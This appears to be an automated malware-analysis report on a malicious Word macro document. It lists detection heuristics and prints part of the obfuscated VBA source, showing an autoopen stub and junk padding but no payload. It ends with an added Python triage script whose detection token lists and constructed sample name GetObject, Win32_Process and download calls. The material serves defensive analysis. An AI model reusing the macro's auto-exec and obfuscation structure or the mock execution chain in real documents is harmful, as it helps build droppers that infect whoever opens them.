Verdict: MALICIOUS
Risk score: 222
Malware insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
ClamAV identifies the file as malware (Doc.Malware.00536d-6934484-0) and olevba recovers a VBA project from it. The project defines Sub autoopen(), which Word runs automatically when the document is opened, and the macro code contains a GetObject call, a common way for a macro to obtain a COM object (for example a WMI or scripting object) through which it can launch a process. The compiled p-code heuristic also found an auto-execution token next to shell/download/object-execution tokens. Taken together this is consistent with a macro downloader that fetches and executes a second-stage payload, although the preview below does not show a payload URL or command: autoopen simply calls JAkAQA, whose body lies beyond the lines shown, and the recovered source is padded with junk (repeated Day, CInt, Log, Atn, Cos and Hex calls on random constants inside opaque If/Select Case blocks) whose only purpose is to bury the real call chain.
Heuristics (7)
- ClamAV detection (critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6934484-0
- VBA macros detected (medium; OLE_VBA_MACROS; 3 related findings): the document contains VBA macro code
- AutoOpen macro (high; OLE_VBA_AUTOOPEN): the VBA project defines an AutoOpen procedure, which Word runs when the document is opened
- GetObject call (high; OLE_VBA_GETOBJ): the macro code calls GetObject, which returns a COM object reference that can be used to launch processes or reach other automation objects
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that the "no modern VBA project was recovered" clause of this canned description contradicts the VBA extraction reported above; for this sample the marker is most likely the same AutoOpen name that OLE_VBA_AUTOOPEN already reports, not evidence of a separate WordBasic macro.
- Embedded URL (info; EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI that Office writes into embedded drawing parts; it is not a network indicator and should not be added to a block list.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 51317 bytes | 74c3700ac7f120d806c1240d29ceeab42c00b2a3c505ca473074740b2df8640a |

Preview: first 1,000 lines of the extracted script (further truncated on this page). olevba writes every module of the VBA project into this one file, so each `Attribute VB_Name` header below marks a module boundary: the document module (VB_Base "1Normal.ThisDocument"), two designer (UserForm) modules whose VB_Base values are GUID pairs, and the standard modules CXZAAB and ZGD_ckQC that hold the procedures. The listing ends before the body of JAkAQA, the procedure that autoopen calls.

```vba
Attribute VB_Name = "wBwDCDQU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "OCDADAAD"
Attribute VB_Base = "0{5E1660AC-1C5B-4601-8C2B-917CE90B077F}{003EC1B5-301F-499C-8316-195B70F4B799}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "GkDACBk"
Attribute VB_Base = "0{94613F18-F5EC-4CD5-BC55-C5D11C3DFC3B}{AC413878-67E0-4190-A2FC-0A5A58E238AA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "CXZAAB"
Function DkZZZA()
If bCQQcA = 240687997 Then
Select Case Y4AAACA1
Case 854290183
Day _
CInt(353689534)
Day CStr(oACAABB _
* 475414670 / 531040945 + Log(cQkAAkx))
Day 834803126
Case 896507899
Day 684169728
Day _
Atn(728937559)
Day Cos(lUCAQUQC + _
CSng(p_XcAAA))
End Select
If jxGGAAA Xor G_GABA Then
Day _
Hex(814187661)
End If
End If
If iABAAB4 = 845718600 Then
Select Case ExZUUA
Case 691970717
Day _
CInt(999630805)
Day CStr(nkAACAA _
* 518230318 / 137836354 + Log(UDXAcDkc))
Day 559022635
Case 320674797
Day 456152693
Day _
Atn(363001595)
Day Cos(OABAAA_ + _
CSng(jA4AAU))
End Select
If SwUUCo Xor zAAoUB Then
Day _
Hex(914058234)
End If
End If
End Function
Sub autoopen()
JAkAQA
End Sub
Function HAAkAwXA()
If zkAx_k = 498428042 Then
Select Case wBCwcAo
Case 307615261
Day _
CInt(480646112)
Day CStr(sUwxAA _
* 663282042 / 992982471 + Log(f1AkAAAG))
Day 835210174
Case 359879233
Day 332880323
Day _
Atn(309605645)
Day Cos(wXGDUC1U + _
CSng(K_A4oAD))
End Select
If oCAwAB Xor UAUUooCx Then
Day _
Hex(69693989)
End If
End If
If ZcAwDAA = 956730295 Then
Select Case pA11AAQ
Case 540418410
Day _
CInt(296876234)
Day CStr(pQUwAA _
* 255697160 / 31380228 + Log(lxcAUAw))
Day 956453124
Case 689392450
Day 753251932
Day _
Atn(45165329)
Day Cos(bUUCGDAD + _
CSng(vAwCBAA4))
End Select
If BAw1AUU Xor QAACBA Then
Day _
Hex(807643208)
End If
End If
If BZC441 = 800363176 Then
Select Case aAxAAAw
Case 733478269
Day _
CInt(620623386)
Day CStr(XcAZ_4 _
* 971021366 / 369160997 + Log(EQQo_Q_))
Day 180790779
Case 205097660
Day 460280401
Day _
Atn(530713947)
Day Cos(GABAA1cA + _
CSng(FAXDxQAC))
End Select
If OQXCAAB Xor jwcZoBkk Then
Day _
Hex(164340210)
End If
End If
End Function
Attribute VB_Name = "ZGD_ckQC"
Function z4_DAo_()
If awoBADDA = 823902824 Then
Select Case vQUGDQQ
Case 280630794
Day _
CInt(357532929)
Day CStr(TwcAC4A _
* 186354655 / 832994829 + Log(JoC_Dw))
Day 794974942
Case 116889907
Day 79305042
Day _
Atn(167595717)
Day Cos(vAAAwk + _
CSng(qk1XX_D))
End Select
If aZwBAA Xor ZxB1UADQ Then
Day _
Hex(507647989)
End If
End If
If BBcAAAQ = 847189907 Then
Select Case NAAUA_
Case 373517403
Day _
CInt(612614484)
Day
... (truncated)
```
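The preview shows the two things an analyst has to get past in a dump like this: the real control flow is one line (autoopen calling JAkAQA) buried under hundreds of discarded built-in calls inside opaque If/Select Case blocks, and the heuristics above (AutoOpen, GetObject, and the p-code token rule for when source extraction fails) are what the analyzer keys on. The following Python is an added example, not the analyzer's output or oletools code. It folds VBA line continuations, splits the dump into procedures, follows the call graph from the auto-exec entry point so that suspicious tokens are only reported in reachable code, measures how much of the source is padding, and includes a raw-byte fallback in the spirit of the OLE_VBA_PCODE_AUTOEXEC_EXEC rule. The token lists are assumptions of mine rather than the analyzer's rule set, and VBA_SAMPLE is a constructed input modelled on the preview: the bodies of JAkAQA and wRun are invented so the chain can be followed end to end, since the real JAkAQA is not in the preview.

```python
"""Static triage of an olevba dump like macros.bas above: find the auto-exec entry
point, follow its call chain, flag object/exec/download tokens only in reachable
procedures, and measure junk padding. Added example for this report, not code from
the analyzer or oletools; VBA_SAMPLE is constructed and its helper bodies invented."""
import re
from collections import deque

AUTOEXEC_NAMES = {"autoopen", "auto_open", "autoexec", "autoclose", "document_open", "workbook_open"}
# Token classes in the spirit of the report's OLE_VBA_GETOBJ and p-code rules (assumed lists).
SUSPICIOUS_TOKENS = {
    "object": re.compile(r"\b(GetObject|CreateObject)\b", re.I),
    "exec": re.compile(r"\b(Shell|Win32_Process|Exec|Run)\b", re.I),
    "download": re.compile(r"\b(URLDownloadToFile|XMLHTTP|WinHttpRequest|ADODB\.Stream)\b", re.I),
}
# Pure built-ins: calling one as a statement (result discarded) is padding, e.g. 'Day CInt(...)'.
PURE_BUILTINS = {"day", "hex", "atn", "cos", "log", "sin", "cint", "cstr", "csng", "clng", "abs"}
CONTROL = re.compile(r"^\s*(If\b|End If\b|Select Case\b|Case\b|End Select\b|Else\b|Dim\b)", re.I)
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(", re.I)
END_RE = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.I)

def fold_continuations(src):
    """Join VBA ' _' line continuations so each statement occupies one line."""
    return re.sub(r"[ \t]_[ \t]*\r?\n[ \t]*", " ", src)

def split_procedures(src):
    """Map lower-cased procedure name -> (original name, non-empty, non-comment body lines)."""
    procs, name, body = {}, None, []
    for line in fold_continuations(src).splitlines():
        m = PROC_RE.match(line)
        if m and name is None:
            name, body = m.group(1), []
        elif name is not None and END_RE.match(line):
            procs[name.lower()] = (name, body)
            name = None
        elif name is not None and line.strip() and not line.lstrip().startswith("'"):
            body.append(line)
    return procs

def triage(src):
    procs = split_procedures(src)
    entries = [n for n in procs if n in AUTOEXEC_NAMES]
    # Call graph: any identifier in a body that names another procedure counts as a call.
    graph = {n: {t.lower() for t in re.findall(r"\b\w+\b", "\n".join(b))
                 if t.lower() in procs and t.lower() != n} for n, (_, b) in procs.items()}
    reachable, queue = set(), deque(entries)
    while queue:  # BFS from the auto-exec entry points
        n = queue.popleft()
        if n not in reachable:
            reachable.add(n)
            queue.extend(graph[n])
    suspicious = {}
    for n in sorted(reachable):
        cats = [c for c, rx in SUSPICIOUS_TOKENS.items() if rx.search("\n".join(procs[n][1]))]
        if cats:
            suspicious[procs[n][0]] = cats
    # Junk ratio over plain statements; control-flow lines (opaque predicates) are excluded.
    stmts = [l for _, b in procs.values() for l in b if not CONTROL.match(l)]
    junk = sum(1 for l in stmts if l.split()[0].lower() in PURE_BUILTINS)
    return {
        "entry_points": [procs[n][0] for n in entries],
        "reachable": sorted(procs[n][0] for n in reachable),
        "unreachable": sorted(procs[n][0] for n in procs if n not in reachable),
        "suspicious": suspicious,
        "junk_ratio": round(junk / len(stmts), 2) if stmts else 0.0,
    }

def scan_raw_stream(data):
    """p-code fallback (cf. OLE_VBA_PCODE_AUTOEXEC_EXEC): with no source, look for an
    auto-exec name next to execution tokens in raw module bytes, 8-bit and UTF-16LE."""
    found = set()
    for enc in ("latin-1", "utf-16-le"):
        text = data.decode(enc, errors="ignore").lower()
        if any(n in text for n in AUTOEXEC_NAMES):
            found.add("autoexec")
        found.update(c for c, rx in SUSPICIOUS_TOKENS.items() if rx.search(text))
    return ("autoexec" in found and len(found) > 1), sorted(found)

# Constructed input modelled on the macros.bas preview; the JAkAQA and wRun bodies are invented.
VBA_SAMPLE = """Function DkZZZA()
If bCQQcA = 240687997 Then
Day _
CInt(353689534)
Day CStr(oACAABB _
* 475414670 / 531040945 + Log(cQkAAkx))
End If
End Function
Sub autoopen()
JAkAQA
End Sub
Function JAkAQA()
Day Atn(728937559)
Set oMon = GetObject(sMonStr)
zRes = wRun(oMon)
End Function
Function wRun(o)
wRun = o.Get("Win32_Process")
End Function
"""

if __name__ == "__main__":
    print(triage(VBA_SAMPLE))
```

On the constructed sample, triage reports autoopen as the only entry point, JAkAQA and wRun as the reachable chain (GetObject in the first, an execution token in the second), DkZZZA as unreachable padding, and a junk ratio of 0.43. Against the real macros.bas the same script would pair the analyzer's AutoOpen and GetObject findings with the procedure that actually uses them, which is the fact an analyst needs before opening the sample in a debugger.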